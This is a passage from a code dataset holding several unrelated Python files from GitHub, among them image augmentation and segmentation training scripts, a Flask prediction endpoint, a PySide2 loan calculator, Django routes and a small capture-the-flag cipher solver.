0,\"数学\":12,\"英语\":20}\n def set_grades(self,course,grade):\n if course in self.grades:\n self.grades[course] = grade\n def print_grandes(self):\n print(f\"学生{self.name} (学号 : {self.student_id}) 的成绩为:\")\n for cource in self.grades:\n print(f\"{cource} : {self.grades[cource]} 分\")\nxiao = Stundent(\"小奶狗\",110)\nxiao.set_grades(\"语文\",100)\nxiao.set_grades(\"数学\",10)\nxiao.set_grades(\"外语\",120)\n\nxiao.print_grandes()\n","repo_name":"54fanqie/pythonProject","sub_path":"simple_test/classTest.py","file_name":"classTest.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4349884925","text":"import os\nimport sys\nfrom Foundation import NSMakeRect\nfrom AppKit import NSTextView\nimport rumps\nimport rumps.compat\ntry:\n from py2app import __version__ as py2app_version\nexcept:\n py2app_version = \"0.14\" # FML\nimport jsontree\nimport halfcaff.util\nimport halfcaff.version\n\n_message = \"\"\"\\\nPrevent OSX from Sleeping when Cisco VPN is connected or TimeMachine is backing up or verifying.\n\n%(copyright)s\n\"\"\" % dict(\n copyright=halfcaff.version.copyright)\n\n_text = \"\"\"\\\nBuilt with Python %(sys_version)s\n\nPython Packages:\n rumps %(rumps_version)s %(rumps_url)s\n py2app %(py2app_version)s %(py2app_url)s\n jsontree %(jsontree_version)s %(jsontree_url)s\n\nAdditional code from:\n https://github.com/pudquick/pyLoginItems\n http://benden.us/journal/2014/OS-X-Power-Management-No-Sleep-Howto/\n\"\"\" % dict(\n sys_version = sys.version,\n rumps_version = rumps.__version__,\n rumps_url = 'https://rumps.readthedocs.io/',\n py2app_version = py2app_version,\n py2app_url = 'https://py2app.readthedocs.io/',\n jsontree_version = jsontree.__version_string__,\n jsontree_url = 'https://github.com/dougn/jsontree'\n)\n\nclass AboutWindow(rumps.Window):\n def __init__(self):\n text = \"Python \" + sys.version + \"\\n\\n\" + sys.copyright\n title = \"HalfCaff \" + halfcaff.version.version\n if halfcaff.util.is_dev_mode():\n title += '-dev'\n super(AboutWindow, self).__init__(\n title=title, message=_message, default_text=_text)\n self.icon = halfcaff.util.icon('halfcaff.icns')\n #self._textfield.dealloc()\n self._textfield = NSTextView.alloc().initWithFrame_(NSMakeRect(0, 0, 320, 160))\n self._textfield.setSelectable_(True)\n #self._textfield.usesRuler_(True)\n self._alert.setAccessoryView_(self._textfield)\n self._textfield.setString_(rumps.compat.text_type(_text))\n\nwindow = AboutWindow()\n\n ","repo_name":"dougn/HalfCaff","sub_path":"halfcaff/about.py","file_name":"about.py","file_ext":"py","file_size_in_byte":1895,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"39773763241","text":"\nimport sys\n\ndef insert_lines(dest, first, second):\n lines = []\n with open(first, 'r') as ff:\n lines += ff.readlines()\n with open(second, 'r') as sf:\n lines += sf.readlines()\n\n with open(dest, 'w') as df:\n df.writelines(lines)\n\n\n\n\nif __name__ == \"__main__\":\n first_file = sys.argv[1]\n second_file = sys.argv[2]\n dest_path = sys.argv[3]\n insert_lines(dest_path, first_file, second_file)\n\n\n","repo_name":"LotanLevy/Crawler","sub_path":"buildDatasetsFiles/mergeDataFiles.py","file_name":"mergeDataFiles.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"35905919773","text":"import torch\nimport random\nimport PIL, PIL.ImageOps, PIL.ImageEnhance, PIL.ImageDraw\nimport numpy as np\nfrom PIL import Image\nfrom tools import shuffle_data\nfrom preprocessing.Datasets import normalize_dataset\n\ndef ShearX(img, v): # [-0.3, 0.3]\n assert -0.3 <= v <= 0.3\n if random.random() > 0.5:\n v = -v\n return img.transform(img.size, PIL.Image.AFFINE, (1, v, 0, 0, 1, 0))\n\ndef ShearY(img, v): # [-0.3, 0.3]\n assert -0.3 <= v <= 0.3\n if random.random() > 0.5:\n v = -v\n return img.transform(img.size, PIL.Image.AFFINE, (1, 0, 0, v, 1, 0))\n\ndef TranslateX(img, v): # [-150, 150] => percentage: [-0.45, 0.45]\n assert -0.45 <= v <= 0.45\n if random.random() > 0.5:\n v = -v\n v = v * img.size[0]\n return img.transform(img.size, PIL.Image.AFFINE, (1, 0, v, 0, 1, 0))\n\ndef TranslateXabs(img, v): # [-150, 150] => percentage: [-0.45, 0.45]\n assert 0 <= v\n if random.random() > 0.5:\n v = -v\n return img.transform(img.size, PIL.Image.AFFINE, (1, 0, v, 0, 1, 0))\n\ndef TranslateY(img, v): # [-150, 150] => percentage: [-0.45, 0.45]\n assert -0.45 <= v <= 0.45\n if random.random() > 0.5:\n v = -v\n v = v * img.size[1]\n return img.transform(img.size, PIL.Image.AFFINE, (1, 0, 0, 0, 1, v))\n\ndef TranslateYabs(img, v): # [-150, 150] => percentage: [-0.45, 0.45]\n assert 0 <= v\n if random.random() > 0.5:\n v = -v\n return img.transform(img.size, PIL.Image.AFFINE, (1, 0, 0, 0, 1, v))\n\ndef Rotate(img, v): # [-30, 30]\n assert -30 <= v <= 30\n if random.random() > 0.5:\n v = -v\n return img.rotate(v)\n\ndef AutoContrast(img, _):\n return PIL.ImageOps.autocontrast(img)\n\ndef Invert(img, _):\n return PIL.ImageOps.invert(img)\n\ndef Equalize(img, _):\n return PIL.ImageOps.equalize(img)\n\ndef Flip(img, _): # not from the paper\n return PIL.ImageOps.mirror(img)\n\ndef Solarize(img, v): # [0, 256]\n assert 0 <= v <= 256\n return PIL.ImageOps.solarize(img, v)\n\ndef SolarizeAdd(img, addition=0, threshold=128):\n img_np = np.array(img).astype(np.int)\n img_np = img_np + addition\n img_np = np.clip(img_np, 0, 255)\n img_np = img_np.astype(np.uint8)\n img = Image.fromarray(img_np)\n return PIL.ImageOps.solarize(img, threshold)\n\ndef Posterize(img, v): # [4, 8]\n v = int(v)\n v = max(1, v)\n return PIL.ImageOps.posterize(img, v)\n\ndef Contrast(img, v): # [0.1,1.9]\n assert 0.1 <= v <= 1.9\n return PIL.ImageEnhance.Contrast(img).enhance(v)\n\ndef Color(img, v): # [0.1,1.9]\n assert 0.1 <= v <= 1.9\n return PIL.ImageEnhance.Color(img).enhance(v)\n\ndef Brightness(img, v): # [0.1,1.9]\n assert 0.1 <= v <= 1.9\n return PIL.ImageEnhance.Brightness(img).enhance(v)\n\ndef Sharpness(img, v): # [0.1,1.9]\n assert 0.1 <= v <= 1.9\n return PIL.ImageEnhance.Sharpness(img).enhance(v)\n\ndef Cutout(img, v): # [0, 60] => percentage: [0, 0.2]\n assert 0.0 <= v <= 0.2\n if v <= 0.:\n return img\n\n v = v * img.size[0]\n return CutoutAbs(img, v)\n\ndef CutoutAbs(img, v): # [0, 60] => percentage: [0, 0.2]\n # assert 0 <= v <= 20\n if v < 0:\n return img\n w, h = img.size\n x0 = np.random.uniform(w)\n y0 = np.random.uniform(h)\n\n x0 = int(max(0, x0 - v / 2.))\n y0 = int(max(0, y0 - v / 2.))\n x1 = min(w, x0 + v)\n y1 = min(h, y0 + v)\n\n xy = (x0, y0, x1, y1)\n color = (125, 123, 114)\n # color = (0, 0, 0)\n img = img.copy()\n PIL.ImageDraw.Draw(img).rectangle(xy, color)\n return img\n\ndef SamplePairing(imgs): # [0, 0.4]\n def f(img1, v):\n i = np.random.choice(len(imgs))\n img2 = PIL.Image.fromarray(imgs[i])\n return PIL.Image.blend(img1, img2, v)\n\n return f\n\ndef Identity(img, v):\n return img\n\ndef augment_list(): # 16 oeprations and their ranges\n # https://github.com/google-research/uda/blob/master/image/randaugment/policies.py#L57\n # l = [\n # (Identity, 0., 1.0),\n # (ShearX, 0., 0.3), # 0\n # (ShearY, 0., 0.3), # 1\n # (TranslateX, 0., 0.33), # 2\n # (TranslateY, 0., 0.33), # 3\n # (Rotate, 0, 30), # 4\n # (AutoContrast, 0, 1), # 5\n # (Invert, 0, 1), # 6\n # (Equalize, 0, 1), # 7\n # (Solarize, 0, 110), # 8\n # (Posterize, 4, 8), # 9\n # # (Contrast, 0.1, 1.9), # 10\n # (Color, 0.1, 1.9), # 11\n # (Brightness, 0.1, 1.9), # 12\n # (Sharpness, 0.1, 1.9), # 13\n # # (Cutout, 0, 0.2), # 14\n # # (SamplePairing(imgs), 0, 0.4), # 15\n # ]\n\n # https://github.com/tensorflow/tpu/blob/8462d083dd89489a79e3200bcc8d4063bf362186/models/official/efficientnet/autoaugment.py#L505\n l = [\n (AutoContrast, 0, 1),\n (Equalize, 0, 1),\n (Invert, 0, 1),\n (Rotate, 0, 30),\n (Posterize, 0, 4),\n (Solarize, 0, 256),\n (SolarizeAdd, 0, 110),\n (Color, 0.1, 1.9),\n (Contrast, 0.1, 1.9),\n (Brightness, 0.1, 1.9),\n (Sharpness, 0.1, 1.9),\n (ShearX, 0., 0.3),\n (ShearY, 0., 0.3),\n (CutoutAbs, 0, 40),\n (TranslateXabs, 0., 100),\n (TranslateYabs, 0., 100),\n ]\n\n return l\n\nclass RandAugment:\n \"\"\"\n Adopted from: https://github.com/ildoonet/pytorch-randaugment\n \"\"\"\n def __init__(self, n, m):\n self.n = n\n self.m = m # [0, 30]\n self.augment_list = augment_list()\n\n def __call__(self, img):\n\n ops = random.choices(self.augment_list, k=self.n)\n for op, minval, maxval in ops:\n val = (float(self.m) / 30) * float(maxval - minval) + minval\n new_img = op(img, val)\n\n return new_img\n\nclass RandAugmentGenerator:\n def __init__(self,\n dataset,\n batch_size,\n stage,\n corruption_mode,\n aug_count = 1,\n aug_rate = 5,\n img_mean_mode=None,\n seed=13,\n orig_plus_aug=True):\n \"\"\"\n :param dataset: (tuple) x, y, segmentation mask (optional)\n :param batch_size: (int) # of inputs in a mini-batch\n :param stage: (str) train | test\n :param corruption_mode: (str) requied for adv RandAugment experiments\n :param aug_count: (int) N in the paper\n :param aug_rate: (int) M in the paper\n :param img_mean_mode: (str) use this for image normalization\n :param seed: (int) seed for input shuffle\n :param orig_plus_aug: (bool) if True, original images will be kept in the batch along with corrupted ones\n \"\"\"\n\n if stage not in ['train', 'test']:\n assert ValueError('invalid stage!')\n\n # Settings\n self.batch_size = batch_size\n self.stage = stage\n self.corruption_mode = corruption_mode\n self.img_mean_mode = img_mean_mode\n self.seed = seed\n self.orig_plus_aug = orig_plus_aug\n\n # Preparation\n self.configuration()\n self.load_data(dataset)\n self.random_augmentation = RandAugment(aug_count, aug_rate)\n\n def configuration(self):\n self.shuffle_count = 1\n self.current_index = 0\n\n def shuffle(self):\n self.image_count = len(self.labels)\n self.current_index = 0\n self.images, self.labels, self.teacher_logits, _ = shuffle_data(samples=self.images,\n labels=self.labels,\n teacher_logits=self.teacher_logits,\n seed=self.seed + self.shuffle_count)\n self.shuffle_count += 1\n\n def load_data(self, dataset):\n self.images = dataset[\"images\"]\n self.labels = dataset[\"labels\"]\n self.teacher_logits = dataset[\"teacher_logits\"] if \"teacher_logits\" in dataset else None\n\n self.len_images = len(self.images)\n self.len_labels = len(self.labels)\n assert self.len_images == self.len_labels\n self.image_count = self.len_labels\n\n if self.stage == 'train':\n self.images, self.labels, self.teacher_logits, _ = shuffle_data(samples=self.images,\n labels=self.labels,\n teacher_logits=self.teacher_logits,\n seed=self.seed)\n\n def get_batch_count(self):\n return (self.len_labels // self.batch_size) + 1\n\n def augment(self, x, n):\n\n x_ = [self.random_augmentation(x) for _ in range(n)]\n\n return x_\n\n def get_batch(self, epoch=None):\n tensor_shape = (self.batch_size, self.images.shape[3], self.images.shape[1], self.images.shape[2])\n teacher_logits = None if self.teacher_logits is None else []\n expansion_coeff = 5 if self.corruption_mode == \"randaugment++\" else 1\n\n if self.orig_plus_aug:\n labels = np.zeros(tuple([self.batch_size] + list(self.labels.shape)[1:]))\n images = torch.zeros(tensor_shape, dtype=torch.float32)\n augmented_images = [torch.zeros(tensor_shape, dtype=torch.float32) for _ in range(expansion_coeff)]\n for i in range(self.batch_size):\n # Avoid over flow\n if self.current_index > self.image_count - 1:\n if self.stage == \"train\":\n self.shuffle()\n else:\n self.current_index = 0\n\n x = Image.fromarray(self.images[self.current_index])\n y = self.labels[self.current_index]\n images[i] = normalize_dataset(x, self.img_mean_mode)\n labels[i] = y\n\n augmented_x = self.augment(x, expansion_coeff)\n for j in range(expansion_coeff):\n augmented_images[j][i] = normalize_dataset(augmented_x[j], img_mean_mode=self.img_mean_mode)\n\n if teacher_logits is not None:\n teacher_logits.append(self.teacher_logits[self.current_index])\n\n self.current_index += 1\n\n # Include teacher logits as soft labels if applicable\n if teacher_logits is not None:\n labels = [labels, np.array(teacher_logits)]\n\n batches = [(images, labels)]\n for i in range(expansion_coeff):\n batches.append((augmented_images[i], labels))\n\n else:\n labels = np.zeros(tuple([self.batch_size] + list(self.labels.shape)[1:]))\n augmented_images = [torch.zeros(tensor_shape, dtype=torch.float32) for _ in range(expansion_coeff)]\n for i in range(self.batch_size):\n # Avoid over flow\n if self.current_index > self.image_count - 1:\n if self.stage == \"train\":\n self.shuffle()\n else:\n self.current_index = 0\n\n x = Image.fromarray(self.images[self.current_index])\n y = self.labels[self.current_index]\n labels[i] = y\n\n augmented_x = self.augment(x, expansion_coeff)\n for j in range(expansion_coeff):\n augmented_images[j][i] = normalize_dataset(augmented_x[j], img_mean_mode=self.img_mean_mode)\n\n if teacher_logits is not None:\n teacher_logits.append(self.teacher_logits[self.current_index])\n\n self.current_index += 1\n\n # Include teacher logits as soft labels if applicable\n if teacher_logits is not None:\n labels = [labels, np.array(teacher_logits)]\n\n batches = []\n for i in range(expansion_coeff):\n batches.append((augmented_images[i], labels))\n\n return batches\n","repo_name":"ExplainableML/ACVC","sub_path":"preprocessing/image/RandAugmentGenerator.py","file_name":"RandAugmentGenerator.py","file_ext":"py","file_size_in_byte":11886,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"61"} +{"seq_id":"18144309831","text":"\"\"\"\n\n\n\"\"\"\n\n# ------------------------------------------------------------------------------\n# AUXILIARY FUNCTIONS\n\ndef options_parse():\n \"\"\"\n Command Line Options Parser:\n initiate the option parser and return the parsed object\n \"\"\"\n\n # imports\n import optparse\n import sys\n\n # define helptext\n HELPTEXT = \"\"\"\n SUMMARY\n\n This is an auxiliary script for the shapetools.py script and is usually\n called from within that script.\n\n The script requires three arguments:\n\n --lst \n --mat \n --lab \n\n \"\"\"\n\n # initialize parser\n parser = optparse.OptionParser(usage=HELPTEXT)\n\n # help text\n h_lst = 'lst file'\n h_mat = 'mat file'\n h_lab = 'lab file'\n\n # specify inputs\n group = optparse.OptionGroup(parser, \"Required Options:\", \"...\")\n group.add_option('--lst', dest='lst', help=h_lst)\n group.add_option('--mat', dest='mat', help=h_mat)\n group.add_option('--lab', dest='lab', help=h_lab)\n parser.add_option_group(group)\n\n # parse arguments\n options, args = parser.parse_args()\n\n # check if there are any inputs\n if len(sys.argv) == 1:\n print(HELPTEXT)\n sys.exit(0)\n\n # check if lst file is given\n if options.lst is None:\n print('\\nERROR: Specify --lst\\n')\n sys.exit(1)\n else:\n print('... Found lst file ' + options.lst)\n\n # check if mat file is given\n if options.mat is None:\n print('\\nERROR: Specify --mat\\n')\n sys.exit(1)\n else:\n print('... Found mat file ' + options.mat)\n\n # check if lab file is given\n if options.lab is None:\n print('\\nERROR: Specify --lab\\n')\n sys.exit(1)\n else:\n print('... Found lab file ' + options.lab)\n\n # return\n return options\n\n\n# -----------------------------------------------------------------------------\n# MAIN FUNCTION\n\ndef createVertexLabels(lstFile, matFile, labFile):\n \"\"\"\n createVertexLabels(createVertexLabels(lstFile, matFile, labFile)\n\n \"\"\"\n\n # imports\n\n import numpy as np\n\n #\n\n lst = np.loadtxt(lstFile, dtype=\"float\")\n mat = np.loadtxt(matFile, dtype=\"float\")\n lab = np.loadtxt(labFile, dtype=\"float\", skiprows=2)\n\n crs = np.array(lst) # to avoid mere referencing\n crs[:, 3] = 1\n\n ras = np.matmul(mat, crs.transpose()).transpose()\n ras = np.append(ras[:, 0:3], lst[:, 3:4], axis=1)\n\n vtx = np.zeros(shape=np.shape(lab)[0])\n for i in range(np.shape(vtx)[0]):\n tmp = np.linalg.norm(ras[:, 0:3] - np.repeat(lab[i:(i + 1), 1:4], np.shape(ras)[0], axis=0), ord=2, axis=1)\n vtx[i] = lst[np.where(tmp == tmp.min())[0][0], 3] # note: we added [0][0] here\n\n # the following lines will produce zero-mean, step-one labels\n # key = np.array(range(0, len(np.unique(vtx)))) - np.mean(range(0, len(np.unique(vtx))))\n # index = np.digitize(vtx, np.unique(vtx), right=True)\n # np.savetxt(fname=labFile.replace(\".label\", \".asc\"), X=key[index])\n\n # the following line will keep original labels\n np.savetxt(fname=labFile.replace(\".label\", \".asc\"), X=vtx)\n\n\n# -----------------------------------------------------------------------------\n# MAIN PART\n\nif __name__ == \"__main__\":\n\n # message\n\n print(\"-------------------------------------------------------------------\")\n print(\"Mapping vertex label to surface\")\n print(\"-------------------------------------------------------------------\")\n\n #\n\n options = options_parse()\n\n #\n\n createVertexLabels(options.lst, options.mat, options.lab)\n","repo_name":"Deep-MI/Hipsta","sub_path":"shapetools/createVertexLabels.py","file_name":"createVertexLabels.py","file_ext":"py","file_size_in_byte":3536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16439947418","text":"from flask import Flask, request, render_template, jsonify, Response\nfrom . import ImageReader\nfrom Global import Core\n\n\ndef BadRequestResponse():\n return Response(\"Bad request\", status=400)\n\n#the flask app is entirely contained here but could be broken down further\ndef CreateApp(name = \"__main__\"):\n folder = Core.Config.Get('template_folder')\n folder = folder if folder is not None else 'templates'\n swinney = Flask(name, template_folder=folder)\n #easter egg\n @swinney.route('/', methods=['GET'])\n def Hello():\n return render_template('index.html')\n\n #very simple output but more complex input checker/response builder can be created\n @swinney.route('/binary', methods=['POST'])\n def Endpoint():\n file = request.files['image'] if 'image' in request.files else None\n if file is None:\n return BadRequestResponse()\n img = ImageReader.FromBinary(file)\n if img is None:\n return BadRequestResponse()\n preds = Core.Resolver.model.GetPredictions(img)\n return jsonify(preds)\n\n return swinney\n","repo_name":"SlavaZinevichUSC/FlaskProjectExample","sub_path":"DirectedResearch/Api/Flask/FlaskFactory.py","file_name":"FlaskFactory.py","file_ext":"py","file_size_in_byte":1090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"15192338861","text":"encryptedHex = \"72f8a3a1bf16dd894894553a4adf624ed82408090c7908d920c3be82b856e7a60ca3426971897c62d8152304256913a576ce859b8120dcb824b2603b5f\"\n\ndef encrypt(data, i):\n ct = bytearray(len(data))\n s = i\n for idx, byte in enumerate(data):\n s = (0x13 * s + 0x32) % 0xff\n ct[idx] = byte ^ s\n return ct\n\nkey = 26\n\n# Find key\nfor i in range(0,0xff):\n if encrypt(b\"helsectf\", i).hex() in encryptedHex:\n print(\"Bingo\", i)\n key = i\n break\nprint(f\"Testing with key {key}\")\n\n# Brute the system \nconfirmed = \"helse\"\nfor x in range(0, 30):\n for i in range(0,256): \n letter = chr(i)\n attempt = f\"{confirmed}{letter}\".encode()\n hexValue = encrypt(attempt, key).hex()\n if hexValue in encryptedHex:\n confirmed += letter\n\nprint(confirmed)\n","repo_name":"thorleifjacobsen/ctf","sub_path":"helsectf-2023/osint2/kryptert adresse/solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"7429536739","text":"import sys\nfrom PySide2 import QtCore, QtGui, QtWidgets\n\nclass SlotWidget(QtWidgets.QWidget):\n def __init__(self):\n QtWidgets.QWidget.__init__(self)\n self.amtLabel = QtWidgets.QLabel('Loan Amount')\n self.roiLabel = QtWidgets.QLabel('Rate of Interest')\n self.yrsLabel = QtWidgets.QLabel('No. of Years')\n self.emiLabel = QtWidgets.QLabel('EMI per month')\n self.emiValue = QtWidgets.QLCDNumber()\n\n self.emiValue.setSegmentStyle(QtWidgets.QLCDNumber.Flat)\n self.emiValue.setFixedSize(QtCore.QSize(130,30))\n self.emiValue.setDigitCount(8)\n\n self.amtText = QtWidgets.QLineEdit('10000')\n self.roiSpin = QtWidgets.QSpinBox()\n self.roiSpin.setMinimum(1)\n self.roiSpin.setMaximum(15)\n self.yrsSpin = QtWidgets.QSpinBox()\n self.yrsSpin.setMinimum(1)\n self.yrsSpin.setMaximum(20)\n \n self.roiDial = QtWidgets.QDial()\n self.roiDial.setNotchesVisible(True)\n self.roiDial.setMaximum(15)\n self.roiDial.setMinimum(1)\n self.roiDial.setValue(1)\n self.yrsSlide = QtWidgets.QSlider(QtCore.Qt.Horizontal)\n self.yrsSlide.setMaximum(20)\n self.yrsSlide.setMinimum(1)\n\n self.calculateButton = QtWidgets.QPushButton('Calculate EMI')\n\n self.myGridLayout = QtWidgets.QGridLayout()\n\n self.myGridLayout.addWidget(self.amtLabel, 0, 0)\n self.myGridLayout.addWidget(self.roiLabel, 1, 0)\n self.myGridLayout.addWidget(self.yrsLabel, 2, 0)\n self.myGridLayout.addWidget(self.amtText, 0, 1)\n self.myGridLayout.addWidget(self.roiSpin, 1, 1)\n self.myGridLayout.addWidget(self.yrsSpin, 2, 1)\n self.myGridLayout.addWidget(self.roiDial, 1, 2)\n self.myGridLayout.addWidget(self.yrsSlide, 2, 2)\n self.myGridLayout.addWidget(self.calculateButton, 3, 1)\n\n self.setLayout(self.myGridLayout)\n self.setWindowTitle(\"A simple EMI calculator\")\n\n self.roiDial.valueChanged.connect(self.roiSpin.setValue)\n self.connect(self.roiSpin, QtCore.SIGNAL(\"valueChanged(int)\"), self.roiDial.setValue)\n self.yrsSlide.valueChanged.connect(self.yrsSpin.setValue)\n\n self.connect(self.yrsSpin, QtCore.SIGNAL(\"valueChanged(int)\"), self.yrsSlide,QtCore.SLOT(\"setValue(int)\"))\n self.connect(self.calculateButton, QtCore.SIGNAL(\"clicked()\"), self.showEMI)\n def showEMI(self):\n loanAmount = float(self.amtText.text())\n rateInterest = float( float (self.roiSpin.value() / 12) / 100)\n noMonths = int(self.yrsSpin.value() * 12)\n emi = (loanAmount * rateInterest) * ( ( ( (1 + rateInterest) ** noMonths ) / ( ( (1 + rateInterest) ** noMonths ) - 1) ))\n self.emiValue.display(emi)\n self.myGridLayout.addWidget(self.emiLabel, 4, 0)\n self.myGridLayout.addWidget(self.emiValue, 4, 2)\n\n# define a new slot that receives and prints a string\ndef printText(text):\n print(text)\n\nclass CustomSignal(QtCore.QObject):\n # create a new signal\n mySignal = QtCore.Signal(str)\n \nif __name__ == '__main__':\n try:\n myObject = CustomSignal()\n # connect signal and slot\n myObject.mySignal.connect(printText)\n # emit signal\n myObject.mySignal.emit(\"Hello, Universe!\")\n except Exception:\n print(sys.exc_info()[1])\n \n# if __name__ == \"__main__\" :\n app = QtWidgets.QApplication(sys.argv)\n win = SlotWidget()\n win.show()\n sys.exit(app.exec_())\n ","repo_name":"yojulab/lecture_pyside2","sub_path":"Lecture_pyside/SignalSlot2_pyside2.py","file_name":"SignalSlot2_pyside2.py","file_ext":"py","file_size_in_byte":3283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27059860222","text":"import tensorflow as tf\nfrom tensorflow import keras\nimport numpy as np\nfrom tensorflow.keras import backend as K\nfrom tensorflow.keras.callbacks import (EarlyStopping, ModelCheckpoint, ReduceLROnPlateau,\n TensorBoard)\nfrom tensorflow.keras.optimizers import Adam\nfrom tensorflow.keras.utils import get_file\nfrom PIL import Image\nimport cv2\nimport glob\nfrom res_zp_deeplab import res_zp_Deeplabv3\nfrom tensorflow.keras.losses import categorical_crossentropy\n\n# -------------------------------------------------------------#\n# Dice loss\n# -------------------------------------------------------------#\ndef dsc(y_true, y_pred):\n smooth = 1.\n y_true_f = K.flatten(y_true)\n y_pred_f = K.flatten(y_pred)\n intersection = K.sum(y_true_f * y_pred_f)\n score = (2. * intersection + smooth) / (K.sum(y_true_f) + K.sum(y_pred_f) + smooth)\n return score\n\ndef dice_loss(y_true, y_pred):\n loss = 1 - dsc(y_true, y_pred)\n return loss\n# -------------------------------------------------------------#\n# Focal Tversky loss\n# -------------------------------------------------------------#\ndef tversky(y_true, y_pred):\n smooth = 1.\n y_true_pos = K.flatten(y_true)\n y_pred_pos = K.flatten(y_pred)\n true_pos = K.sum(y_true_pos * y_pred_pos)\n false_neg = K.sum(y_true_pos * (1 - y_pred_pos))\n false_pos = K.sum((1 - y_true_pos) * y_pred_pos)\n alpha = 0.7\n return (true_pos + smooth) / (true_pos + alpha * false_neg + (1 - alpha) * false_pos + smooth)\n\n\ndef focal_tversky(y_true, y_pred):\n y_true = tf.cast(y_true, tf.float32)\n y_pred = tf.cast(y_pred, tf.float32)\n\n pt_1 = tversky(y_true, y_pred)\n gamma = 0.75\n return K.pow((1 - pt_1), gamma)\n\n\ndef tversky_loss(y_true, y_pred):\n return 1 - tversky(y_true, y_pred)\n\ndef unit_loss(y_true, y_pred):\n return (2 - tversky(y_true, y_pred)-dsc(y_true, y_pred))/2\n\n\n# -------------------------------------------------------------#\n# IoU\n# -------------------------------------------------------------#\ndef iou(y_true, y_pred):\n smooth = 1.\n intersection = K.sum(y_true * y_pred)\n sum = K.sum(y_true + y_pred)\n iou = (intersection + smooth) / (sum - intersection + smooth)\n return iou\n\n# -------------------------------------------------------------#\n# A generater to read images and labels\n# -------------------------------------------------------------#\ndef generate_arrays_from_file(lines, batch_size):\n n = len(lines)\n i = 0\n while 1:\n X_train = []\n Y_train = []\n for _ in range(batch_size):\n if i == 0:\n np.random.shuffle(lines)\n name = lines[i].split(';')[0]\n img = glob.glob(\"./img/\" + name)\n img = cv2.resize(cv2.imread(img[0], 1), (int(WIDTH), int(HEIGHT)))\n img = np.array(img) / 255.0\n X_train.append(img)\n name = lines[i].split(';')[1].split()[0]\n label = glob.glob(r\"./label/\" + name)\n label = cv2.resize(cv2.imread(label[0], 0), (int(WIDTH), int(HEIGHT)))\n label = np.array(label) / 255.0\n if len(np.shape(label)) == 3:\n label = np.array(label)[:, :, 0]\n label = np.reshape(np.array(label)/255, [-1])\n one_hot_label = np.eye(NCLASSES)[np.array(label, np.int32)]\n Y_train.append(one_hot_label)\n yield (np.array(X_train), np.array(Y_train))\n\nif __name__ == \"__main__\":\n # ------------------------------------------------------------------------------------------#\n # Define the height and width of the input image, and the number of types\n # ------------------------------------------------------------------------------------------#\n HEIGHT = 512\n WIDTH = 512\n batch_size = 4\n NCLASSES = 2\n\n log_dir =\"./log/\"\n lr_set = 1e-7\n Xcep_weight_dir = None#r\"C:\\wyh\\deeplab\\deeplabv3-X\\text_xception.h5\"\n model = res_zp_Deeplabv3(classes=NCLASSES, input_shape=(HEIGHT, WIDTH, 3))#,train_cl=True,Xcep_weight_dir=Xcep_weight_dir)\n weights_path = './log/last1.h5'\n model.load_weights(weights_path, by_name=True)\n\n \n with open(\"./train.txt\", \"r\") as f:\n lines = f.readlines()\n\n np.random.seed(10101)\n np.random.shuffle(lines)\n np.random.seed(None)\n num_val = int(len(lines) * 0.1)\n num_train = len(lines) - num_val\n\n tensorboard_callback = tf.keras.callbacks.TensorBoard(log_dir=log_dir, histogram_freq=1)\n checkpoint = ModelCheckpoint(log_dir + 'ep{epoch:03d}-LOSS{loss:.3f}-val_LOSS{val_loss:.3f}.h5',\n monitor='val_loss', save_weights_only=True, save_best_only=True,mode='min')\n reduce_lr = ReduceLROnPlateau(monitor='val_loss', factor=0.5, patience=3, verbose=1,mode='min')\n early_stopping = EarlyStopping(monitor='val_iou', min_delta=0, patience=10, verbose=1,mode='max')\n\n if True:\n lr = lr_set\n #batch_size = 2\n model.compile(loss=dice_loss,#focal_tversky,#dice_loss,#tversky_loss,#'categorical_crossentropy',#custom_loss,\n optimizer=Adam(lr=lr),\n metrics=[ dice_loss,tversky_loss,focal_tversky, iou,'acc'])\n\n print('Train on {} samples, val on {} samples, with batch size {}.'.format(num_train, num_val, batch_size))\n model.fit_generator(generate_arrays_from_file(lines[:num_train], batch_size),\n steps_per_epoch=max(1, num_train // batch_size),\n validation_data=generate_arrays_from_file(lines[num_train:], batch_size),\n validation_steps=max(1, num_val // batch_size),\n epochs=100,\n initial_epoch=0,\n callbacks=[checkpoint, reduce_lr, tensorboard_callback])#, early_stopping])\n model.save_weights(log_dir + 'last1.h5')\n\n","repo_name":"dia123blo/MCASPP_Deeplabv3-","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":5837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"7113504775","text":"from django.urls import path\nfrom . import views\napp_name = 'todos'\nurlpatterns = [\n path('', views.index, name = 'home'),\n path('show/', views.show_todo, name = 'id'),\n path('create', views.create, name = 'create'),\n path('postTodo', views.postTodo, name = 'postTodo'),\n path('/delete', views.deleteTodo, name = 'deleteTodo')\n]","repo_name":"sawrozpdl/djangoapp","sub_path":"todos/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14299729487","text":"import csv\nimport sqlite3\n\nconn = sqlite3.connect('movie.db')\ncur = conn.cursor()\nprint(\"connected to sqlite3\")\n\n\ndef db_drop_table():\n cur.execute(\"DROP TABLE IF EXISTS movie_table;\")\n print(\"Table cleared\")\n\ndef db_create_table():\n cur.execute(\"CREATE TABLE IF NOT EXISTS movie_table (\"\n \"color, director_name, num_critic_for_reviews, duration, director_facebook_likes, \"\n \"actor_3_facebook_likes, actor_2_name, actor_1_facebook_likes, \"\n \"gross REAL, \"\n \"genres, 